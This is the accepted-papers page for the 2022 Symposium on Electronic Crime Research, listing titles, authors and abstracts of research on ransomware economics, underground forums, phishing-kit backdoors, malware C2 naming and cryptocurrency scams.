Symposium on Electronic Crime Research

Submission: September 9

Notification: October 21

Camera ready: November 18

Conference: Nov 30-Dec 2

Accepted Papers for the Symposium on Electronic Crime Research 2022

Money Over Morals: A Business Analysis of Conti Ransomware

Ian W. Gray (New York University)

Jack Cable

Vlad Cuiujuclu (Flashpoint)

Benjamin Brown (University of Michigan)

Damon McCoy (New York University)

Ransomware operations have evolved from conducting unsophisticated attacks into highly coordinated cybercrime syndicates that regularly extort millions of dollars in a single attack. Despite dominating headlines and crippling businesses across the globe, there is relatively little in-depth research into the modern structure and economics of ransomware operations.

In this paper, we leverage leaked chat messages to provide an in-depth empirical analysis of Conti, one of the largest ransomware groups. By analyzing these chat messages, we construct a picture of Conti’s operations as a highly-profitable business, from profit structures to employee recruitment and roles. We present novel methodologies to trace ransom  payments, identifying over $100 million in likely ransom payments to Conti and its predecessor — over five times as much as in previous public datasets. As part of our work, we publish a dataset of 666 labeled Bitcoin addresses related to Conti and an additional 75 Bitcoin addresses of likely ransom payments. Future work can leverage this case study to more effectively trace — and ultimately counteract — ransomware activity.                  

Exploring Social Network of Trust Across Major Crime Types in an Underground Forum

Dalyapraz Manatova (Indiana University Bloomington)

Dewesha Sharma (Indiana University Bloomington)

Sagar Samtani (Indiana University)

L. Jean Camp (Indiana University)

Underground markets support e-crime by providing a place where merchants and buyers trade assets for a price utilizing various digital currencies, payment providers, and wallets. The anonymity of these marketplaces and incentives to avoid penalties for criminal activity create significant challenges in studying trust in these ecosystems. Underground forums are clearinghouses where deals can be arranged, and services can be identified as vendors and customers engage. Such forums may be open and do not clear transactions, nonetheless still offer opportunities for entry, entrepreneurship, and customer or product discovery, serving as critical intermediaries for the marketplaces and enabling new entrants to establish trust and actors in one market to reach out to another.

The empirical evaluation of interactions in such forums illuminates how collaborative networks form, interact, socialize, and exchange knowledge. To contribute to understanding online crime, we offer an empirical analysis of an underground forum. Specifically, we examine interactions in the social network as a whole and those components of the network that support three major types of crime: traditional crimes that occur away from keyboards, transitional crimes that have both offline and online instantiations, and entirely online new crimes. We compare and contrast the network structure of these three types and document the interactions between their social networks. The results suggest that although communities follow the small world effect, identifying and removing highly connected moderators or prolific contributors will not harm any of these three communities or the network unless a significant percentage of the network is removed. By further observing the structural patterns, we find that transitional crime actors tend to cluster more compared to the other two crimes while having the highest density.

Rationalising the ransom demands of cyber criminals: An analysis of ransomware investigation reports

Tom Meurs (University of Twente)

Marianne Junger (University of Twente)

Erik Tews (University of Twente)

Abhishta Abhishta (University of Twente)

In recent years, ransomware attacks have led to disastrous consequences for victims, not just due to the payment ransom amount but also due to the recovery costs associated with these attacks. So far only a few empirical studies have analysed the financial impact of ransomware attacks. This study aims to rationalise the ransom demands associated with these attacks. To do so, we evaluate the factors that determine the ransom requested by attackers. We build a dataset based on 453 ransomware attack investigation reports in the Netherlands reported to the Dutch Police between 2019 and 2022. Using rational choice model of crime (RCM) and crime scripting we hypothesise that the effort of an attacker, victim characteristics and context variables influence not only the ransom demanded by an attacker but also the financial losses reported by victims. We use generalised linear models to evaluate and quantify this influence. Our results show that attacker’s effort such as using ransomware as a service (RaaS) and victim characteristics such as industry sector contribute to the ransom requested by attackers and financial losses reported by victims. We also show that availability of recoverable backups explains the likelihood of victims paying the ransom. Our methodology and results lay the groundwork for such future large-scale empirical studies and add to our understanding of attacker and victim behaviour.

THREAT/crawl: a Trainable, Highly-Reusable, and Extensible Automated Method and Tool to Crawl Criminal Underground Forums

Michele Campobasso (Eindhoven University of Technology)

Luca Allodi (Eindhoven University of Technology)

Collecting data on underground criminal communities is highly valuable both for security research and security operations. Unfortunately these communities live within a constellation of diverse online forums that are difficult to infiltrate, may adopt crawling monitoring countermeasures, and require the development of ad-hoc scrapers for each different community, making the endeavour increasingly technically challenging, and potentially expensive. To address this problem we propose THREAT\crawl, a method and prototype tool for a highly reusable crawler that can learn a wide range of (arbitrary) forum structures, can remain under-the-radar during the crawling activity and can be extended and configured at the user will. We showcase the tool’s capabilities and provide prime evaluation of our prototype against a range of active, live, underground communities.

Leaky Kits: The Increased Risk of Data Exposure from Phishing Kits

Bhaskar Tejaswi (Concordia University)

Nayanamana Samarasinghe (Concordia University)

Sajjad Pourali (Concordia University)

Mohammad Mannan (Concordia University)

Amr Youssef (Concordia University)

Phishing kits allow adversaries with little or no technical experience to launch phishing websites in a short time. Past research has found such phishing kits that contain backdoors (e.g., obfuscated email addresses), which are intentionally added by the kit developers to obtain the phished data. In this work, we augment prior research by exploring several ways in which security flaws in phishing kits make the victim data accessible to a wider set of adversaries beyond the kit deployers and kit developers. We implement an automated framework for kit collection and analysis, which includes a custom command-line PHP execution tool (for dynamic analysis) along with other open-source tools. Our analysis focuses on finding backdoors (e.g., obfuscated email address, command injection), measuring the extent of disclosure of sensitive information (e.g., via exposed plaintext files, hardcoded Telegram bot tokens, hardcoded admin console passwords) and detecting security vulnerabilities in phishing kits. We analyze 4238 distinct phishing kits (from a set of 26,281 compressed files collected from several sources over a span of 15 months), each having unique SHA-1 hash value. We found that 3.9% of the analyzed kits contained at least one form of backdoor. We also found hardcoded admin console passwords and API keys used to access third party services, in 8.3% and 16% of the analyzed kits, respectively. In addition, 15.8% of the analyzed kits wrote stolen information (PII) of users in plaintext files; 5.6% kits did not restrict external access to these plaintext files, leading to exposure of sensitive phished data (e.g., 178,504 passwords, 133,248 email addresses, 1253 credit card numbers). Furthermore, 11.7% of the analyzed kits contained hardcoded Telegram bots; we obtained invite links to join Telegram chats in 0.5% kits, and found them to expose chat messages containing sensitive PII information of victims (e.g., 73,342 passwords, 141,095 email addresses, 3584 credit card numbers). We also found that 64% of the kits are affected by security vulnerabilities (e.g., insecure file operations, SQL injection), which can be abused to further expose user data.

The Challenges of Blockchain-Based Naming Systems for Malware Defenders

Audrey Randall (UC San Diego)

Wes Hardaker (USC/ISI)

Aaron Schulman (UC San Diego)

Stefan Savage (University of California, San Diego)

Geoffrey M. Voelker (UC San Diego)

Successful malware campaigns often rely on infected hosts’ ability to locate and contact C2 servers. Malware campaigns often used DNS domains for this purpose, but DNS domains may be taken down by the registrar that sold them. In response to this threat, malware operators have begun using blockchain-based naming systems to store C2 server names. Blockchain naming systems are a threat to malware defenders because they are not subject to a centralized authority, such as a registrar, that can take down abused domains, either voluntarily or under legal pressure. In fact, blockchains are robust against a variety of interventions that work on DNS domains, which is bad news for defenders.

We analyze the ecosystem of blockchain naming systems and identify new locations for defenders to stage interventions against malware. In particular, we find that malware is obligated to use centralized or semi-centralized infrastructure to connect to blockchain naming systems and modify the records stored within. In fact, scattered interventions have already been staged against this centralized infrastructure: we present case studies of several such instances. We also present a study of how blockchain naming systems are currently abused by malware operators, and discuss the factors that would cause a blockchain naming system to become an unstoppable threat. We conclude that existing blockchain naming systems still provide opportunities for defenders to prevent malware from contacting its C2 servers.

“I don’t really give them piece of mind”: User Perceptions of Social Engineering Attacks

Lin Kyi (Carleton University)

Elizabeth Stobert (Carleton University)

How do end users understand social engineering attacks, and how do their perceptions of these attacks differ from reality? To investigate, we proposed a new social engineering attack framework, and ran two studies to examine exactly how and when users are misunderstanding social engineering attacks. In our first study, we conducted 30 qualitative interviews asking people about their understanding of and experiences with social engineering attacks. We found that confidence and accuracy are the two main factors affecting users’ knowledge of social engineering attacks. In our second study, we quantified how confidence and accuracy impact users’ perceptions at different stages of an attack. We found that users tend to be overconfident in their ability to understand social engineering attacks, but hold inaccurate beliefs. Participants had major misconceptions of what constitutes social engineering, and the risks of these attacks. Based on our results, we propose educational and design opportunities to match social engineering mitigation strategies to user perceptions of social engineering.

“Invest in crypto!”: An analysis of investment scam advertisements found in Bitcointalk

Gilberto Atondo Siu (University of Cambridge)

Alice Hutchings (University of Cambridge)

Marie Vasek (University College London)

Tyler Moore (The University of Tulsa)

This paper investigates the evolution of investment scam lures and scam-related keywords in the cryptocurrency online forum Bitcointalk over a period of 12 years. Our findings show a shift in scam-related keywords found within posts in the forum, where “Ponzi” was the most popular and most frequently mentioned in 2014 and 2018 and “HYIP” appeared more often in 2018 and 2021. We also identify that the financial principle is the tactic more likely to be used to lure people into investment scams from 2015 until 2017, coinciding with the period when “Ponzi” was the most commonly found keyword. This is followed by a transition to the authority and distraction principles from 2018 until 2022, which also coincides with the increase of popularity of “HYIP”.

We collect more than 17.8M posts from 399k threads from the forum from July 2010 until June 2022. Our longitudinal analysis shows the popularity transition between subforums and keywords across time. We design a categorisation criteria and annotate 4,218 posts from 2,630 threads based on it. We then use the annotated sample to train four machine learning statistical models. We use the best performing model to classify all 281k English-language threads into four categories: overt scams, potential scams, scam comments and not investment scam related. We analyze the frequency changes of scam-related threads across the 12 year period and observe that overt and potential scams peaked in 2015 and 2018 respectively. We see that potential scams also increased during the COVID-19 pandemic. We use heuristics to pinpoint the types of cryptocurrencies most frequently used within scam advertisements. Bitcoin is most commonly found in potential scams while Ethereum appears more often than other cryptocurrencies in overt scams. We use machine learning classifiers to identify the scam actor types behind the posts categorised as overt and potential scams. We also classify the type of lure used by scammers. Our results indicate that the time principle is not a tactic used as frequently as expected. Finally, we observe the influence of the pandemic in the strategies used to lure victims, reflected in higher than expected use of the kindness principle in 2021 and 2022.

The Role of Extraversion in Phishing Victimisation: A Systematic Literature Review

Pablo López-Aguilar (APWG.EU & Universitat Rovira i Virgili)

Agusti Solanas (Universitat Rovira i Virgili & APWG.EU)

Constantinos Patsakis (University of Piraeus)

Over the last decade, phishing attacks have become preeminent and increasingly successful. Anti-phishing strategies focus on raising awareness and training users to identify risks. However, those strategies do not fully consider the psychological profile of each individual. We sustain that maximising potential victims’ resilience requires additional protection strategies to focus on individual personality traits.

In this article, we concentrate on extraversion as a personality trait for which there is no consensus about its effect on susceptibility to phishing attacks. We implement a robust bibliographic analysis methodology and identify potentially relevant articles, which we screen and filter against inclusion and exclusion criteria. We report and analyse the findings of the 39 articles that fulfil all criteria and are deemed relevant to this research. Our analysis shows that, despite the positive correlation between extraversion and phishing susceptibility found in many studies, there is no consensus supported by a well-established psychological theory. Moreover, we identify a number of reasons justifying this lack of consensus, namely the use of non-representative samples, the non-consideration of contextual factors, and the use of self-reported personality tests, which lead to limited reproducibility and data inconsistencies.

Cryptocurrency Exchange Closure Revisited (Again)

Tyler Moore (University of Tulsa)

Arghya Mukherjee (University of Tulsa)

Exchanges serve an essential role in the cryptocurrency ecosystem. It is through exchanges that most people acquire Bitcoin and other cryptocurrencies, often avoiding the blockchain entirely. Because so many customers put their trust and financial resources in exchanges, it is no surprise that they have long been targets of cybercriminal actors. This paper examines 707 cryptocurrency exchanges operational from 2018-2021. We find that 30% of these exchanges subsequently shut down. Using regression and survival analysis, we investigate the factors that could precipitate the closure of exchanges. Consistent with prior work, we find evidence that experiencing security breaches are associated with closure. However, we find that the strongest effects are connected to how the exchange operates. Exchanges that only trade cryptocurrencies and not fiat face 7-9 times greater odds of shutting down than those that trade both. Meanwhile, exchanges that permit US customers or are hosted in OECD countries shut down more quickly, which suggests that the regulatory environment may affect exchange lifetimes.

General Chair: Guy-Vincent Jourdan, University of Ottawa

Program Chair: Laurin Weissinger, Fletcher School at Tufts / Yale University

Publication Chair: Moury Bidgoli, Accenture, APWG Research Fellow